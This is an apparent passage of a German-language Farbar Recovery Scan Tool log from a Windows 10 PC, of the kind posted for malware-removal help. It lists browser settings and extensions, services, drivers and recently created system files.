HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation)

Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> hxxps://www.google.ch/

FireFox:
========
FF ProfilePath: C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-09]
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\***\AppData\Local\Google\Chrome\User Data\Default [2017-08-09]
CHR Extension: (Google*Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R1 MpKsl174ac0cd; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1930F23C-426D-4967-B2BF-B8BF84D915B1}\MpKsl174ac0cd.sys [44928 2017-08-08] (Microsoft Corporation)
R1 MpKsla84e905b; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A7D2BD46-1D78-4F16-85FF-98FC90F0D75A}\MpKsla84e905b.sys [44928 2017-08-09] (Microsoft Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-09 18:58 - 2017-08-09 18:58 - 002381824 _____ (Farbar) C:\Users\***\Desktop\FRST64.exe
2017-08-09 18:58 - 2017-08-09 18:58 - 000000000 ____D C:\Users\***\Desktop\FRST-OlderVersion
2017-08-09 18:40 - 2017-08-09 18:55 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-08 23:04 - 2017-08-08 23:04 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-08 19:26 - 2017-08-01 04:39 - 008319392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-08 19:26 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-08-08 19:26 - 2017-08-01 04:38 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-08 19:26 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-08-08 19:26 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-08-08 19:26 - 2017-08-01 04:36 - 000119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-08 19:26 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2017-08-08 19:26 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2017-08-08 19:26 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-08-08 19:26 - 2017-08-01 04:33 - 000473240 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-08 19:26 - 2017-08-01 04:32 - 002444704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-08 19:26 - 2017-08-01 04:32 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-08 19:26 - 2017-08-01 04:32 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-08 19:26 - 2017-08-01 04:31 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 002645680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 000212384 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000723680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000410160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000315288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000182688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000143736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000082336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-08-08 19:26 - 2017-08-01 04:26 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-08 19:26 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-08-08 19:26 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2017-08-08 19:26 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2017-08-08 19:26 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-08-08 19:26 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-08-08 19:26 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tokenbinding.dll
2017-08-08 19:26 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-08-08 19:26 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sscore.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll
2017-08-08 19:26 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-08-08 19:26 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-08-08 19:26 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-08-08 19:26 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-08-08 19:26 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptprov.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-08-08 19:26 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-08-08 19:26 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-08-08 19:26 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-08-08 19:26 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-08-08 19:26 - 2017-08-01 03:57 - 023677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-08 19:26 - 2017-08-01 03:45 - 001275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-08 19:26 - 2017-08-01 03:44 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-08 19:26 - 2017-08-01 03:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys
2017-08-08 19:26 - 2017-08-01 03:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-08-08 19:26 - 2017-08-01 03:42 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-08 19:26 - 2017-08-01 03:40 - 017366528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-08 19:26 - 2017-08-01 03:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-08 19:26 - 2017-08-01 03:39 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-08 19:26 - 2017-08-01 03:38 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-08 19:26 - 2017-08-01 03:38 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-08 19:26 - 2017-08-01 03:36 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-08 19:26 - 2017-08-01 03:35 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-08-08 19:26 - 2017-08-01 03:34 - 000805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-08 19:26 - 2017-08-01 03:33 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-08 19:26 - 2017-08-01 03:33 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-08 19:26 - 2017-08-01 03:32 - 007336960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-08 19:26 - 2017-08-01 03:32 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 004445696 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 001396736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 008209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-08 19:26 - 2017-08-01 03:30 - 001052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-08 19:26 - 2017-08-01 03:28 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-08 19:26 - 2017-08-01 03:28 - 002516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 001802752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 000574464 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 000482816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2017-08-08 19:26 - 2017-08-01 03:26 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-08 19:26 - 2017-08-01 03:25 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\coredpus.dll
2017-08-08 19:26 - 2017-08-01 03:25 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2017-08-08 19:26 - 2017-08-01 03:25 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
